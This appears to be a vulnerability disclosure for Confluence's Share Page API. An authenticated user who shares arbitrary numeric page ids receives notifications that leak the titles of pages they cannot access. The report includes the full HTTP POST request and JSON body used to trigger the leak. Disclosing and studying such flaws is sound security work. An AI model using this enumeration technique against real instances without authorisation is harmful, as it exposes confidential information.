Inaccessible page titles leaked by Share Page API

The Share Page API exposes a REST endpoint that is available to authenticated users of Confluence. It is possible for any user to share any page simply by specifying the corresponding numeric id and the resulting notification includes the title of the shared page. In particular, a user may obtain the title of any page in a Confluence instance, including those to which they have no access, simply by iterating over all possible identifiers. Although the content of pages is not available in the notification, this still represents a moderately serious information leak.

The following POST request was made whilst authenticated to a Confluence instance as user “phill”:

POST /rest/share-page/latest/share HTTP/1.1 Host: confluenceserver:8090 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/plain, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json; charset=utf-8 X-Requested-With: XMLHttpRequest Referer: http://192.168.79.130:8090/display/ds/2013/09/18/another+blog+post Content-Length: 82 Cookie: confluence-sidebar.width=285; AJS.conglomerate.cookie="|streams.view.2147942400=full-view"; confluence.browse.space.cookie=space-blogposts; JSESSIONID=EF049B1CFBDE8A8B36252AC9D18ED8FC; mywork.tab.tasks=false Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

{"users":["phill"],"emails":[],"groups":[],"note":"","entityId":"524789"}

The entityId value represents a page in a space that is inaccessible to the user “phill”. The resulting notification to the user "phill" includes the title of the inaccessible page.